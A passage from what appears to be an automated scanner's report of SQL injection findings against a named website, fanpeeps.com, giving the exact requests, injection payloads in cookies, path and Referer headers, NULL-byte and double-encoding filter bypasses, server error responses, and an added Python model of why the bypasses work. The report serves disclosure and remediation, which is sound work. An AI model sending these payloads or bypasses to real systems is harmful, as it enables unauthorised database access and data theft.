Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 45737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.58. http://fanpeeps.com/ncaa2.php [__utma cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /ncaa2.php

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the __utma cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /ncaa2.php HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2'waitfor%20delay'0%3a0%3a20'--; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:44:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17291

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.59. http://fanpeeps.com/ncaa2.php [__utmz cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /ncaa2.php

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payload '%20and%201%3d1--%20 was submitted in the __utmz cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /ncaa2.php HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)'%20and%201%3d1--%20; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:44:08 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17272

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.60. http://fanpeeps.com/ncaa2.php [__utmz cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /ncaa2.php

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /ncaa2.php HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%00'; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 1

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:47:07 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17507

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /ncaa2.php HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%00''; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 2

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:47:08 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 50565

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.61. http://fanpeeps.com/ncaa2.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /ncaa2.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload waitfor%20delay'0%3a0%3a20'-- was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /ncaa2.php?1waitfor%20delay'0%3a0%3a20'--=1 HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:46:14 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 18110

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.62. http://fanpeeps.com/thumbnailviewer.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /thumbnailviewer.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /thumbnailviewer.css')waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:26 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17397

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.63. http://fanpeeps.com/thumbnailviewer.css [Referer HTTP header]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /thumbnailviewer.css

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /thumbnailviewer.css HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:17 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17370

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /thumbnailviewer.css HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:17 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 45737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.64. http://fanpeeps.com/thumbnailviewer.css [__utma cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /thumbnailviewer.css

Issue detail

The __utma cookie appears to be vulnerable to SQL injection. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the __utma cookie, and a database error message was returned. Review the error message and the application's handling of other input to confirm whether a vulnerability is present.

The database appears to be MySQL. WAITFOR DELAY is Microsoft SQL Server syntax that MySQL does not recognise, so the error here is caused by the unbalanced single quote breaking the query, not by the delay clause executing. To test for a time-based blind condition on MySQL, use a payload built on SLEEP() or BENCHMARK() and compare the response time with that of a baseline request.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /thumbnailviewer.css HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2'waitfor%20delay'0%3a0%3a20'--; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:07 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17272

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.65. http://fanpeeps.com/thumbnailviewer.css [__utmb cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /thumbnailviewer.css

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection. The payload %00' was submitted in the __utmb cookie, and a database error message was returned. Review the error message and the application's handling of other input to confirm whether a vulnerability is present.

The database appears to be MySQL.

The scanner infers from this result that the application attempts to block SQL injection and that the block can be circumvented by submitting a URL-encoded NULL byte (%00) in front of the blocked character. Treat that inference with care: a plain single quote in the __utmc and __utmz cookies (1.66 and 1.73) triggers the same error with no NULL byte, so the "filter" may be an artefact of response variance rather than real input validation. Confirm by submitting __utmb with a bare ' and then with '' and comparing the two responses.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages, including PHP warnings, from being returned in responses. NULL byte bypasses typically arise when a filter in front of the application, for example a web application firewall, is written in native code where strings are terminated by a NULL byte: the filter stops reading at %00 and never sees the quote, while PHP strings carry an explicit length, so the byte and everything after it survive into the query. Fix the actual vulnerability in the application code by parameterising the query, and if appropriate ask the WAF vendor to provide a fix for the NULL byte bypass.
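The following is an added example, not code from the XSS.CX report or from fanpeeps.com. It models why the two bypasses reported in this section get past a quote filter that runs before the value is canonicalised: double URL-encoding (%2527, as in 1.63 for the Referer header and again in 1.78 for the __utmc cookie) and a NULL byte in front of the quote (%00', as in 1.65). The filter, the second urldecode() in application code and the C-style NULL truncation are hypothetical stand-ins for behaviour the report only infers. The single decode applied before the filter models PHP's decoding of cookie values into $_COOKIE; a request header such as Referer is not decoded by Apache or PHP, so there both decodes would have to be the application's own, but the ordering flaw is identical.

```python
"""Added example, not code from the XSS.CX report or from fanpeeps.com.

Shows a quote filter that runs before canonicalisation being bypassed by
%2527 (double URL-encoding) and by %00' (NUL byte), and the same filter
catching both once it runs after canonicalisation. Filter, second decode
and NUL truncation are hypothetical stand-ins.
"""
from typing import Optional
from urllib.parse import unquote

BLOCKED = ("'", '"')


def c_string_view(value: str) -> str:
    """What a filter written in C sees of the value: strlen() stops at the
    first zero byte, so everything after a NUL is invisible to it."""
    nul = value.find("\x00")
    return value if nul < 0 else value[:nul]


def has_quote(value: str) -> bool:
    return any(ch in value for ch in BLOCKED)


def naive_filter_passes(received: str) -> bool:
    """Filter applied to the value as the application receives it (after
    PHP's one decode), through a NUL-terminated string."""
    return not has_quote(c_string_view(received))


def app_canonicalise(received: str) -> str:
    """The application's own extra urldecode(), the second decode overall."""
    return unquote(received)


def value_reaching_query(raw_cookie: str, validate_after_canonicalise: bool) -> Optional[str]:
    """Return the string that would be concatenated into SQL, or None when
    the filter rejects the request. PHP strings are length-counted, so the
    NUL byte is preserved here rather than truncated."""
    received = unquote(raw_cookie)  # PHP populating $_COOKIE
    if validate_after_canonicalise:
        value = app_canonicalise(received)
        return None if has_quote(value) else value
    if not naive_filter_passes(received):
        return None
    return app_canonicalise(received)


if __name__ == "__main__":
    # Constructed payloads, taken from the shapes used in the report.
    payloads = {
        "plain quote": "181893936'",
        "double-encoded (1.63, 1.78)": "181893936%2527",
        "NUL then quote (1.65)": "181893936.9.10.1305376380%00'",
    }
    for order in (False, True):
        print("validate after canonicalise:", order)
        for name, raw in payloads.items():
            print(f"  {name:30s} -> {value_reaching_query(raw, order)!r}")
```

Moving validation after canonicalisation closes both bypasses in this model, but it is still a filter; the value reaching the query should be bound as a parameter so that a quote that does get through has no effect on the statement.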

Request

GET /thumbnailviewer.css HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380%00';

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:43 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17138

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.66. http://fanpeeps.com/thumbnailviewer.css [__utmc cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /thumbnailviewer.css

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /thumbnailviewer.css HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936'; __utmb=181893936.9.10.1305376380;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:26 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 18102

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /thumbnailviewer.css HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936''; __utmb=181893936.9.10.1305376380;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:26 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 45737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.67. http://fanpeeps.com/thumbnailviewer.css [__utmz cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /thumbnailviewer.css

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the __utmz cookie, and a database error message was returned. The ',0) prefix is the scanner's attempt to close an INSERT value list before appending the delay; review the error message and the application's handling of other input to confirm whether a vulnerability is present.

The database appears to be MySQL. WAITFOR DELAY is Microsoft SQL Server syntax that MySQL does not recognise, so the error observed comes from the unbalanced quote and closing parenthesis breaking the query, not from any delay executing.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /thumbnailviewer.css HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)',0)waitfor%20delay'0%3a0%3a20'--; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:43:52 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 18100

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.68. http://fanpeeps.com/thumbnailviewer.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /thumbnailviewer.js

Issue detail

The REST URL parameter 1 (here the first and only path segment, that is the filename itself) appears to be vulnerable to SQL injection. The payload ' was appended to the path, giving /thumbnailviewer.js', and a database error message was returned. The unmodified path also yields the custom 404 page but without the warning (compare Response 2 of 1.73), so the requested URI itself is evidently incorporated into the query issued by the 404 handler. Review the error message and the application's handling of other input to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /thumbnailviewer.js' HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:32 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17281

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.69. http://fanpeeps.com/thumbnailviewer.js [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /thumbnailviewer.js

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload " was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /thumbnailviewer.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;
Referer: http://www.google.com/search?hl=en&q="

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:32 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17392

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.70. http://fanpeeps.com/thumbnailviewer.js [__utma cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /thumbnailviewer.js

Issue detail

